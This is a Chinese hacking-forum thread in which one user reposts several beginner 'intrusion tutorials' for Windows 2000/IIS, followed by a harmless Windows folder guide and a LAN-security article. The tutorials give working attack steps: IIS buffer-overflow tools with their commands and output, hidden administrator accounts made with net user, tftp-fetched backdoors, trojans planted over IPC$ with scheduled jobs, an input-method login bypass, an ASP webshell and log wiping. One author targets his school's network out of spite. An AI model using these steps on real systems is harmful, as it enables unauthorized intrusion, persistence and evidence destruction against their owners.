入侵第一步:扫描网段,(如果你是高手当然不必如此,因为这样即浪费金钱,又浪费时间,而且等于是在检查主机安全性,但我们要从菜鸟到高手,这步是必须的。)怎样找ip地址呢?到搜狐上去,用浏览器打开网页,在网页打开过程中我们会看到浏览器左下脚他的ip地址,或者我们在cmd命令行中输入:ping www.hack.com.cn,马上会得到它的ip地址。我们还是拿www服务器来练习,先扫描提供该服务的服务器,也就是打开80端口的机器。扫端口最快的还是scanner了。在扫描范围中我们添入ip段从192.168.0.1-192.168.0.254,(此地址为局域网当中的虚拟地址,在互连网当中你看不到这个地址),所有端口定义中我们只添80就好了,扫描开始,结果这么多,哪些是我们的目标呢?显示为:"http/1.1 500 server error..server:microsoft-iis/5.0..date:wed,29....."后面省略不写了,为什么我们要这样的机器呢,因为它安装了iis而且它多半没有打补丁,所以漏洞依然存在了,这部扫描很关键,大家要注意。下面就拿出其中的某一个主机来进行漏洞入侵。
拿出我推荐给大家的xscan_gui,安全焦点下载最新版2.3。相当厉害的扫描器,打开xscan,ctrl+M,在扫描范围中我们选cgi和iis漏洞,如果扫描结果中没有很快的出现红色的漏洞说明或是只扫到idq或ida漏洞,那我们换下一台主机,因为这台打了sp3了。如果扫到cgi和iis漏洞的话,那么等于我们已经拿到管理员权限了。
第二步:拿到超级用户的权限。我们刚扫到一台有idq漏洞的机器,可以用snake的idq溢出程序,加一个用户,选好操作系统类型后,在“要绑定的命令”中添上cmd.exe /c net user hack 1234 /add(注意1234后要有空格),发送数据完成,我们再加一个用户叫做winshell,密码是1234,这很有必要,后面有用。
先不要马上把它添加到管理员组,因为你不知道管理员组组名是不是administrator,很多有经验的管理员把它该掉了,怎么办呢?有办法。我们拿出ntcmd tool,记得流光工具里有,我们用刚才的用户连上去吧,看看有哪些用户,net user命令显示:administrator等,这个用户是管理员,我们看看他属于哪个组,net user administrator显示本地组会员:*winadmin,*users.哈,果然改名了,下面我们再拿出idq溢出工具,在绑定命令中添好cmd.exe /c net localgroup winadmin hack /add,到此我们已经拿到管理员权限了,(有些人问到:“idq溢出不是打开一个端口吗?没错,但当你用nc连接以后,只能执行一条命令然后再从新溢出才行。这不是很麻烦吗?”)。让我喝口水,喘喘气吧,不行,管理员既然改了管理员组名,他也一定会发现该组多了一个用户的,好我们继续,拿出小榕的克隆帐号工具ca和cca,ca \\192.168.0.1 hack 1234 winshell 1234 ,数据发送完毕,然后用cca检查一下cca \\192.168.0.1 winshell 1234,结果是winshell as same as administrator说明成功了,而且这个帐户通过帐户管理器是发现不了在管理员组的,这下可以放心休息一下了。
第三步:后门安装。对于拨号学入侵的菜鸟来说,后门的大小决定了入侵的成功率。我下面来具体对当今流行的后门作下介绍,lion写的hall功能很强,但是安装出现失败的机率很高;至于telnet后门,我觉得很容易被发现,初学者的最爱还是wollf吧,这可是安焦的女黑客作品哦,我们男同志可要加油了。准确说,这是一个命令行的remote control tool,先上传好了,我们采用逆向连接方式,找到tftp32,将wollf.exe放到f:\根目录下,base directory选择f:\,server inerfaces添上自己的ip地址(192.168.0.2)。然后我们再拿出ntcmd,用winshell用户连接,把刚才加的hack删掉吧,net user hack /del ,tftp -i 192.168.0.2 get wollf.exe c:\winnt\system32\wollf.exe,好了看到数据传输了吧,不到一分钟,一切搞定。下面只要执行它就好了,怎么执行,这很简单,在ntcmd中输入c:\winnt\system32\wollf.exe,怎么样,后门安装完毕,自动打开7614端口,我们在自己机器上打开cmd,敲wollf -connect 192.168.0.1 7614,连上后,在#后面敲dos,就和在自己机器上一样使用了,使用中会由于网络问题出现间断现象,那就换上ADSL宽带吧。
第四步:安装win2000客户端。很多菜鸟要求使用图形工具方便直观,满足你们好了。如上面上传wollf.exe一样,我们上传hbulot.exe,你可以在黑白网络下载。然后用ntcmd执行:hbulot.exe /r后,对方马上重起并打开服务。然后就可以用2000可户端连接了。简单吧?
第五步:擦除日志。可以在2000客户端连接以后在计算机管理里面清除掉所有日志,因为我们在这没办法选择删除,全删了算了。
以上四步是最简单的入侵手段,也是集成了当今的一些入侵思路,可以帮助大家练习。下面再说说碰到特殊的主机怎么办,所谓特殊,也就是,网管使用防火墙过滤,只允许外界和自己的某些端口连接,我们安装后门也没用处,别急,方法很多了,我们可以利用端口反弹技术,让主机自动和我们连接,比如网络神偷等,在这我给大家介绍一个不用此原理仍可以使用的工具,我们利用它开的80端口啊?想起来了吗?aspmm海洋顶端网木马,这个工具是用asp写的,我们将他里面的几个文件上传到它的web目录下面。在浏览器中敲入:192.168.0.1\index.asp,密码添www.haiyang.wzr.net,怎么样很方便是不是,这个密码可以在上传前更改。密码存在index.asp文件中,用原文件查看,就看到密码了。方便的东西功能也少,只有上传功能,不过仔细研究还是用处很大,使用此工具,对方必须支持asp,和文件系统控件的使用。
总结:相信大家在按照上面的方法执行的话,一定会对入侵有初步体会的。如果有事请大家联系我的qq:56496792.祝大家好运
          robbiness                                    2003.1.29


B33层 发表时间: 11/10 20:38

回复: mingming8 [mingming8]   论坛用户   登录
给新手一个找肉鸡的简单方法
--------------------------------------------------------------------------------
作者:d0nNy 来源:未知 日期:2002-12-22 点击:3648

--------------------------------------------------------------------------------

首先,你需要一个小东西,nc.exe。(什么东西?!~◎#¥%……※×(---)阿嘎嘎,我也不知道,自己慢慢的搜索引擎里面找,你认为是什么就是什么了撒。^_^

接着编辑一个bat批处理文件。(什么是批处理,晕,来一个人送我去医院,哦,不是一群人。阿嘎嘎)

----------cut here---------------------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
----------cut here---------------------

运行批处理程序之后,你就等着肉鸡上门来找你吧,阿嘎嘎。

(注:多为2000,中毒的主机,注意区分地区,有国外的主机,像我这里是拨号上网,一般来说,每天10个不成问题,中间夹杂着韩国的主机。)

肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞

自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器。.........中间省略45037字。........尽量抓3389,用3389给肉鸡打补丁。之后就要恭喜你,你终于有自己的主机了,只是最好不要随便外传。

两种好处:
1。你有肉鸡用。
2。向那些傻瓜级的网管学习怎么管理主机。

两种坏处:
1。暴露自己,被白帽子盯上。
(有这样的可能性,不过连补丁都不晓得的网管怕他干什么。)
2。过于的相信自己是黑客
(我还是老老实实的看书,不懂汇编永远不是黑客,我不懂所以我不是。阿嘎


B34层 发表时间: 11/10 20:43

回复: mingming8 [mingming8]   论坛用户   登录
9种常用的黑客攻击方法
许多上网的用户对网络安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇,干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟网络世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在受到安全方面的攻击时,付出惨重的代价时才会后悔不已。同志们要记住啊!防人之心不可无呀!
  为了把损失降低到最低限度,我们一定要有安全观念,并掌握一定的安全防范措施,禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解了他们的攻击手段,我们才能采取准确的对策对付这些黑客。
1、获取口令
  这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大,因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。
2、放置特洛伊木马程序
  特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。
3、WWW的欺骗技术
  在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。
4、电子邮件攻击
  电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的网络管理员有定期给用户免费发送防火墙?         


B35层 发表时间: 11/10 20:44

回复: mingming8 [mingming8]   论坛用户   登录
黑客入侵教程 www.030405.com  2002-12-25  詹氏电脑


首先拿出我的利器SCAN,(设置和操作不用我说了吧!真的不懂就看说明吧。)在参考模块填上他给的IP xxx.xxx.xxx.xxx(随便在这里交代一下,要想得到IP可以用现在流行的无广告补丁的QQ吧,又快又方便。)接着按下开始吧~~~不一会儿就扫出了一大堆漏洞!呵呵!让我看看有没有超级漏洞。哈,这个用户也不太小心了吧,难道他不知道微软出了补丁吗?竟然连3389这个大漏洞给我发现了。万岁!快点拿出终端客户端进行连接吧!没有的朋友到这里下(http://ycrx.y365.com/index2.html)

连接后用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” ―― “输入法指南” ―― “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” ―“目标”―c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” ―― “目标”―― c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。(这就是利用2000的输入法漏洞入侵!)

(二) 139端口入侵

本来有想过把这篇文章整理的,后来看到那个多的小鸟还是在默默探索中,于心不忍呀,事先声明,这不是一篇适合高手看的文章,其中用到了很多工具(也是怕各小鸟看不明白复杂的DOS提示呀)废话少说了,看文章了

今天上电脑课被老师训了一顿,回到家越想越生气,虽然我没有吃亏,毕竟心里很不舒服,TMD,搞掉他的局域网,看他怎样上课!

好不容易才呆到晚上8点,行动时间到了,操,不对啊,我还不知道学校的IP,哎失败失败真失败:“老师能说出你们电脑的IP吗?什么,不懂?咳~你怎样做老师的啊!!(随便提一下在MS―DOS里输入ipconfig就知道)呵呵!!看到了xxx.xxx.xxx.xxx,对方的系统是2000,心中窃喜呀,先扫一扫 ‘在说,
139=NetBios-SSN 端口开放!!

1025=NetSpy.698 端口开放!!

5000=Blazer 5 端口开放!!

看来都是没有用的,姨~等等,那不是传说中的139吗?HOHO!事情好办多了,还以为要艰苦一番,没想到这么简单,再拿出NetBrute Scanner一扫,果然都出来了,CDEFE都有共享,先看C盘,试着建立个文件,成功,HOHO,不错不错,毕竟这样操作太复杂了一些,先传个马上去在说
net use H: \\xxx.xxx.xxx.xxx\c$
这个命令不用我说明了吧,先映射他的C盘 。
然后再传个木马
看看系统时间,还有程序运行时间。
net time \\xxx.xxx.xxx.xxx
at \\xxx.xxx.xxx.xxx 15:04 程序.exe

我推荐国产的冰河.好使好用,操作简单,方便管理,当然是经过捆绑的拉。记住放在启动那里,以便每次都运行(但碰到拨号上网的动态IP,就很难再找回他了)。重启对方的机子,用原创发的2K/2000远程重启工具吧。等一会程序运行了!拿出服务器连上就行拉。对于高手来说,完全可以用指令实现,
copy con h:\reboot.bat
  iisreset /reboot
  CTRL+Z

这个命令明白吗,就是在对方计算机下生成一个可以重起计算机的文件,前面我们已经将他的C盘映射到了我们的H盘
接着是老命令
net time \\xxx.xxx.xxx.xxx
  得到对方的时间

at \\xxx.xxx.xxx.xxx 重起的时间 c:\reboot.bat
  重起的时间等于对方的时间加几分钟
最后看一看任务加入没有
at \\xxx.xxx.xxx.xxx
  看看任务加上没有
呵呵~!等成功后你喜欢做什么就做什么咯,记住我不提倡做违法的行为,给捉了就不好拉!
文章我虽然不用一天就写出来,其实我也是个菜鸟,对网络也是略知一二,第一次写教程,有不足之处,肯请赐教。相信会花时间看这篇文章的人,都是对入侵一知半解的。其实,我个人认为,微软的Windows 2K和NT是世界上应用范围很广,最容易学习的一种操作系统(OS),同时也是漏洞最多的OS,作为新手,我建议大家从2K和NT的入侵开始学起。我会陆续介绍有关入侵的手段及入侵后可以做的有利于自己的事。


B36层 发表时间: 11/10 20:45

回复: mingming8 [mingming8]   论坛用户   登录
教菜鸟入侵--溢出篇
--------------------------------------------------------------------------------
作者:淘气精灵 来源:精灵谷 日期:2003-02-11 点击:2783

--------------------------------------------------------------------------------

教菜鸟入侵--溢出篇  淘气精灵
这是我的第一篇教程,呵呵~大家给点掌声,我在这里把我的一些经验告诉大家。
这里说的入侵说得是2000或NT
首先,介绍几个要用的命令
-------------------------
  net user rover rover1234 /add
在远程主机上创建用户rover密码rover1234(受限)
  net localgroup administrators rover /add
把rover用户添道administrators组(这就成了超级管理员了,呵呵)
注意:要使这两条命令成功,必须是ADMIN权限,TELNET登陆,QL的sa密码,IIS远程命令行,都可以的,但ipc$不行,因为~~这个~~好像ipc是本地shell吧,反正不可能啦
---------------------------------
  net use \\ip\ipc$ "rover1234" /user:"rover"
建立ipc$链接 用户rover密码rover1234
  copy rover.exe \\ip\admin$\system32
把根目录下的准备好的rover.exe传道远程主机system32目录下
  netsvc \\ip schedule /start
用小榕的netsvc打开对方的时间服务(netsvc必须放在DOS根目录下)
  net time
看时间^_^
  at \\ip XX:XX rover.exe
在xx:xx
------------------------------
呵呵~这些都是获取可写权限后要打的命令
好了,不罗嗦了,唉,这是菜鸟教程,不要说我罗嗦,我是很努力要你们懂啊
现在说入侵
介绍一个扫描工具“X-SCANR”现在好像最新的是V2.3吧
随便扫上一段IP,10个ip 至少一半主机有漏洞,(建议扫外国的ip漏洞,安全、不用清日志^_^而且漏洞特多)
那么多的扫描选项!~~为了节省我们的时间和金钱 x-scanr 设置--》扫描模块--》把端口和iis漏洞打勾
其余的去掉,因为我下面介绍的是iis溢出漏洞 ,在扫描参数设置扫描IP断就可以工作了
我们要找得是--》
------------------------------
可能存在"IIS 5.0 .printer远程缓冲区溢出"漏洞
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq)
---------------------------------
只要能扫到这三个里面的一个,那么我们就有60%的成功机会了,呵呵~超级管理员A~
先说IIS 5.0 .printer漏洞,好像去年5月公布的,很有前途啊,呵呵~~
先去http://www.sunx.org去下载一个几K的小工具 -iis5hacker.exe顺便也把idahacker.exe拉下来,一会儿要用
把这两个工具放在dos根目录下,因为是在dos下运行的
c:\documents and settings\rover\--这是我的默认dos目录,你把它放在rover文件夹里就可以调用
介绍一下iis5hacker的命令格式
iis5hack <目标主机IP> <WEB端口80> <主机类型><要溢出的端口>
中文WIN2K:      0
中文WIN2K sp1:  1
英文WIN2K:      2
英文WIN2K, sp1: 3
日文WIN2K:      4
日文WIN2K, sp1: 5
现在记好你扫到的那个IIS 5.0 .printer远程缓冲区溢出漏洞的IP,准备溢出
c:\documents and settings\rover\iss5hacker ip 80 0 99
如果显示--》
E:\HACK\print>iis5hack ip 80 3
iis5 remote .printer overflow. writen by sunx http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
Now you can telnet to 99 port
good luck :)
就说明你溢出成功了,可以从99端口telnet登录,恭喜
继续
c:\documents and settings\rover\telnet ip 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
看见了吧,进入远程主机了,呵呵,现在可是超级管理员权限啊~~这个溢出的99端口存活的时间很短,大概几分钟吧,创建用户足够了,用我前面介绍的net命令创建超级管理员,呵呵~~
然后用ipc管道种木马,其实有比较简单的方法,流光自带一个ipc种植者,添上“ip 用户 密码 选择文件”
然后开始 就会自动植入运行
现在介绍下一个漏洞,这两个有一个就行了,一般他们是成对出现的^_^
---------------------------
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida)
可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq)
-----------------------------
使用idahacker.exe
格式
idahacker <目标主机IP> <WEB端口80> <主机类型><要溢出的端口>
和iis5hacker差不多
主机类型你自己看,打入idahacker /?
eg.
c:\documents and settings\rover\idahacker ip 80 1 99
好了,下面不用我说吧。这个也是建立一个端口是99的telnet
还有很重要的一点你用上两种方法telnet上去,建立超级用户后一定要正常退出,不然iis会死掉
退出方法---》
C:\WINNT\system32>exit
就是用exit了,然后显示已断开与主机的连接,回到自己机子的提示符下了

还有我给初学者的一些建议,我自己也算是初学者吧,我只是说一下个人体会:
1。不要老是依赖一些智能工具,至少你依赖的时候知道他的基本原理,不然你永远不会提高
2。不要老是以为自己可以用一些QQ炸弹之类的玩具而沾沾自喜,那是很无聊的事情,并且它并不会给你带来什  么,它只会让网上的一些高手小瞧你,hacker没有那么简单
3。关于QQ,在黑白屋里好多人找我要QQ,还有人发一些放QQ,盗QQ之类的帖子,但我真想不出要那么多QQ干什  么用,有些人就是靠QQ来联系的,盗QQ并不是一个hacker应有的作风�q∩�r(�幡洇幔┄q∩�r鄙视你!!
4。如果你觉得对2000和NT很熟了,那恭喜你。建议再去学unix或linux,网络的鼻祖
5。至少学一门编程语言,初学者建议学VB,不提倡一开始就学C


淘气精灵
maio to: rover-lover@yeah.net
homepage http://rover123.yeah.net
12:09 2003-2-11


B37层 发表时间: 11/10 20:46

回复: mingming8 [mingming8]   论坛用户   登录
揭密windows系统目录功能
发布: 艰苦 日期: 11-11 类别: 新手上路 今日/总浏览: 33/3663 

相信大家对于Windows是再熟悉不过了,我们天天都在用它,但是对于Windwows中系统目录你又了解多少呢?本文将对Win9x、WinME和Win2000中的系统目录做个详细的介绍,包括功能和简单应用。

  所谓系统目录就是指操作系统的主要文件存放的目录,目录中的文件直接影响到系统是否正常工作,了解这些目录的功能,相信对你更好的使用系统会有很大的帮助。以下介绍的目录若不做特殊说明,在Win9x/ME系统下,它们在Windows目录中,在Win2000系统下,他们在Winnt目录中。

  All Users文件夹:

  『Win9x/ME』所有用户文件夹,里面里面包括系统缺省登录时的桌面文件和开始菜单的内容。

  『Win2000』在Win2000的系统目录中没有这个文件夹,Win2000将用户的信息放在根目录下的Documents and Settings文件夹中,每个用户对应一个目录,包括开始菜单、桌面、收藏夹、我的文档等等。

  Application Data文件夹:

  『Win9x/ME』应用程序数据文件夹。包括任务栏中的快捷方式,输入法的一些文件等等。根据你系统中使用不同的软件,该目录中的内容也有所不同。

  『Win2000』在Documents and Settings文件夹中,每个用户都对应一个Application Data文件夹,同样每个用户由于使用的软件不同,目录内容也相同。

  Applog文件夹:

  『Win9x/ME』应用程序逻辑文件目录。逻辑文件是用来记录应用软件在运行时,需要调用的文件、使用的地址等信息的文件。要查看这些文件,用记事本打开即可。

  Catroot文件夹:

  『Win9x』计算机启动测试信息目录,目录中包括的文件大多是关于计算机启动时检测的硬软件信息。

  『WinME』该文件夹位于系统目录的system目录中。

  『Win2000』该文件夹位于系统目录的system32目录中。

  Command文件夹:

  『Win9x/ME』DOS命令目录。包括很多DOS下的外部命令,虽说都是些小工具,但真的很好用,特别是对于系统崩溃时。

  『Win2000』这些DOS命令位于系统目录的system32目录中。

  Config文件夹:

  『Win9x/ME/2000』配置文件夹,目录中包括一些MIDI乐器的定义文件。

  Cookies文件夹:

  『Win9x/ME』Cookies又叫小甜饼,是你在浏览某些网站时,留在你硬盘上的一些资料,包括用户名、用户资料、网址等等。

  『Win2000』每个用户都有一个Cookies文件夹,位于Documents and Settings文件夹的每个用户目录中。

  Cursors文件夹:

  『Win9x/ME/2000』鼠标动画文件夹。目录中包括鼠标在不同状态下的动画文件。

  Desktop文件夹:

  『Win9x/ME』桌面文件夹。包括桌面上的一些图标。

  『Win2000』这个文件夹在系统目录中也存在,同时在Documents and Settings文件夹的每个用户目录中还有“桌面”文件夹。

  Downloaded Program Files文件夹:

  『Win9x/ME/2000』下载文件文件夹。该文件夹包含显示已打开的Web页所需的文件,其中大部分文件是用来运行Web页面上的动画。

  Drwatson文件夹:

  『Win9x/ME/2000』华生医生文件夹。本来华生医生可以在系统发生错误时拍下系统快照,但这个目录只有一个超文本文件。

  Favorites文件夹:

  『Win9x/ME』收藏夹文件夹。如果需要重新安装系统,请备份这个目录,这样可以保留收藏夹中的内容。

  『Win200』每个用户都有一个Favorites文件夹,位于Documents and Settings文件夹的每个用户目录中。

  Fonts文件夹:

  『Win9x/ME/2000』字体文件夹。在这个目录中可以添加删除字体文件,也可以删除一些不必要的文件而减少系统占用硬盘的空间。

  Help文件夹:

  『Win9x/ME/2000』帮助文件的文件夹,Windows有个好处就是有详细的帮助文件,这个目录里面就包括很多帮助文件,遇到问题多看看帮助文件,对你会有很大的帮助。
History文件夹:

  『Win9x/ME』历史文件夹。IE浏览器有一个功能可以自己记录用户浏览过的网址,这个目录就是用来存放这些网址的。

  『Win2000』每个用户的历史文件都是相互独立的。位于Documents and Settings文件夹的每个用户目录中Local Settings目录里面。

  Inf文件夹:

  『Win9x/ME/2000』安装文件文件夹。在安装驱动程序时,系统会提示我们指定相应的Inf文件。要使用这些文件也很简单,直接选取其右键菜单中的“安装”即可。

  Java文件夹:

  『Win9x/ME/2000』和JAVA相关的一些文件夹。包括Classes和Packages两个子文件夹,其中Packages中包含了一些压缩文件和一些数据文件。在Win2000中还包括Trustlib子目录。

  Media文件夹:

  『Win9x/ME/2000』媒体文件夹。主要包括一些声音和MIDI文件,系统启动、错误等时候发出的声音就是使用这个目录下的文件。

  NetHood文件夹:

  『Win9x/ME』网络覆盖目录,使用网上邻居时需要用到此目录。

  『Win2000』位于Documents and Settings文件夹的每个用户目录中。
Offline Web Pages文件夹:

  『WinME/2000』脱机Web页面。当某个站点设置成允许脱机使用时,相应的在这个文件夹中会有所对应。

  OPTIONS文件夹:

  『WinME』WinME特有的文件夹,用来存放安装文件。

  Pif文件夹:

  『Win9x/ME』程序信息文件目录。Pif文件是DOS程序的快捷方式。

  PrintHood文件夹:

  『Win9x/ME』打印覆盖目录。

  Recent文件夹:

  『Win9x/ME』最近打开文档文件夹。这个目录中的内容对应“开始”菜单中“文档”里面的内容。

  『Win2000』位于Documents and Settings文件夹的每个用户目录中。

  Samples文件夹:

  『Win9x/ME』模板文件夹。主要是Windows利用脚本文件处理一些事情的范例,你可以通过记事本来查看这些范例。

  SendTo文件夹:

  『Win9x/ME』发送文件夹。目录中的内容对应于鼠标右键菜单中发送的内容,你可以在这里面进行添加而修改发送菜单中的项目。

  『Win2000』位于Documents and Settings文件夹的每个用户目录中。

  ShellNew文件夹:

  『Win9x/ME/2000』新建文件夹。文件夹中的文件是对应鼠标右键菜单“新建”中文件的模板。当你选择“新建”中选择某个文件,,系统就在目录中寻找相对应的模板文件。

  Spool文件夹:

  『Win9x/ME』Spool文件夹中有一个Printers目录,在进行打印操作时,打印所产生的转换文件就暂存于这个目录中。

  Start Menu文件夹:

  『Win9x/ME』开始菜单文件夹。对应开始菜单中的程序,你可以在这个目录下对开始菜单进行修改。

  『Win2000』在Documents and Settings文件夹的每个用户目录中有个“「开始」菜单”目录,也是同样的功能。

  Sysbckup文件夹:

  『Win9x/ME』系统备份文件夹。系统会自动备份注册表以及系统文件,打包放在这个目录下,需要恢复时只需要解开文件将其覆盖会相应的目录即可。

  System文件夹:

  『Win9x/ME/2000』系统文件夹。系统中的重要文件都放在这个目录下,同时在安装新软件时也会向这个目录中拷贝文件。由于这里面很多文件是多个软件公用的,在删除软件时提示要删除这个目录中的文件最好选择不要删除。

  System32文件夹:

  『Win9x/ME/2000』32位的系统的文件夹,里面包含了许多虚拟设备文件。同样也是很重要,在对里面的文件进行删减时也要特别注意。

Tasks文件夹:

  『Win9x/ME/2000』计划任务文件夹,该文件夹包含已计划的Windows任务。Windows将按照指定的时间来运行这些任务。

  Temp文件夹:

  『Win9x/ME/2000』临时文件目录。在系统和软件的运行过程中会产生很多临时的文件,就存放在这个目录中。定期清理这个目录中的文件,可以减少硬盘的垃圾。

  Temporary Internet Files文件夹:

  『Win9x/ME』IE下载文件缓冲区。使用IE浏览器浏览网页时,系统会自动将浏览过的网页内容放在这个目录中,当你再次打开相同的网页时系统会从这个目录中进行提取,这样可以加快浏览的速度。

  『Win2000』每个用户都有一个Temporary Internet Files文件夹,位于Documents and Settings文件夹的每个用户目录中的Local Settings目录里面。

  Web文件夹:

  『Win9x/ME/2000』该文件夹中的文件主要是一些超文本模板、频道的图标和图像等等。Windows系统中一些窗口的布局也是通过这里面的文件来完成的。以前没有觉得这个目录重要,后来发现欢乐时光病毒就是通过感染这个目录中的文件来达到破坏的目的。

  由于系统目录中的文件都很重要,所以在进行修改时要特别小心,如果你对系统不是太熟悉,建立你还是不要去动它们。


B38层 发表时间: 11/10 20:47

回复: mingming8 [mingming8]   论坛用户   登录
局域网安全 www.030405.com  2002-12-25  詹氏电脑


目前的局域网基本上都采用以广播为技术基础的以太网,任何两个节点之间的通信数据包,不仅为这两个节点的网卡所接收,也同时为处在同一以太网上的任何一个节点的网卡所截取。因此,黑客只要接入以太网上的任一节点进行侦听,就可以捕获发生在这个以太网上的所有数据包,对其进行解包分析,从而窃取关键信息,这就是以太网所固有的安全隐患。

  事实上,Internet上许多免费的黑客工具,如SATAN、ISS、NETCAT等等,都把以太网侦听作为其最基本的手段。

  当前,局域网安全的解决办法有以下几种:

  1.网络分段

  网络分段通常被认为是控制网络广播风暴的一种基本手段,但其实也是保证网络安全的一项重要措施。其目的就是将非法用户与敏感的网络资源相互隔离,从而防止可能的非法侦听,网络分段可分为物理分段和逻辑分段两种方式。

  目前,海关的局域网大多采用以交换机为中心、路由器为边界的网络格局,应重点挖掘中心交换机的访问控制功能和三层交换功能,综合应用物理分段与逻辑分段两种方法,来实现对局域网的安全控制。例如:在海关系统中普遍使用的DEC MultiSwitch 900的入侵检测功能,其实就是一种基于MAC地址的访问控制,也就是上述的基于数据链路层的物理分段。

  2.以交换式集线器代替共享式集线器

  对局域网的中心交换机进行网络分段后,以太网侦听的危险仍然存在。这是因为网络最终用户的接入往往是通过分支集线器而不是中心交换机,而使用最广泛的分支集线器通常是共享式集线器。这样,当用户与主机进行数据通信时,两台机器之间的数据包(称为单播包Unicast Packet)还是会被同一台集线器上的其他用户所侦听。一种很危险的情况是:用户TELNET到一台主机上,由于TELNET程序本身缺乏加密功能,用户所键入的每一个字符(包括用户名、密码等重要信息),都将被明文发送,这就给黑客提供了机会。

  因此,应该以交换式集线器代替共享式集线器,使单播包仅在两个节点之间传送,从而防止非法侦听。当然,交换式集线器只能控制单播包而无法控制广播包(Broadcast Packet)和多播包(Multicast Packet)。所幸的是,广播包和多播包内的关键信息,要远远少于单播包。

  3.VLAN的划分

  为了克服以太网的广播问题,除了上述方法外,还可以运用VLAN(虚拟局域网)技术,将以太网通信变为点到点通信,防止大部分基于网络侦听的入侵。

  目前的VLAN技术主要有三种:基于交换机端口的VLAN、基于节点MAC地址的VLAN和基于应用协议的VLAN。基于端口的VLAN虽然稍欠灵活,但却比较成熟,在实际应用中效果显著,广受欢迎。基于MAC地址的VLAN为移动计算提供了可能性,但同时也潜藏着遭受MAC欺诈攻击的隐患。而基于协议的VLAN,理论上非常理想,但实际应用却尚不成熟。

  在集中式网络环境下,我们通常将中心的所有主机系统集中到一个VLAN里,在这个VLAN里不允许有任何用户节点,从而较好地保护敏感的主机资源。在分布式网络环境下,我们可以按机构或部门的设置来划分VLAN。各部门内部的所有服务器和用户节点都在各自的VLAN内,互不侵扰。

  VLAN内部的连接采用交换实现,而VLAN与VLAN之间的连接则采用路由实现。目前,大多数的交换机(包括海关内部普遍采用的DEC MultiSwitch 900)都支持RIP和OSPF这两种国际标准的路由协议。如果有特殊需要,必须使用其他路由协议(如CISCO公司的EIGRP或支持DECnet的IS-IS),也可以用外接的多以太网口路由器来代替交换机,实现VLAN之间的路由功能。当然,这种情况下,路由转发的效率会有所下降。

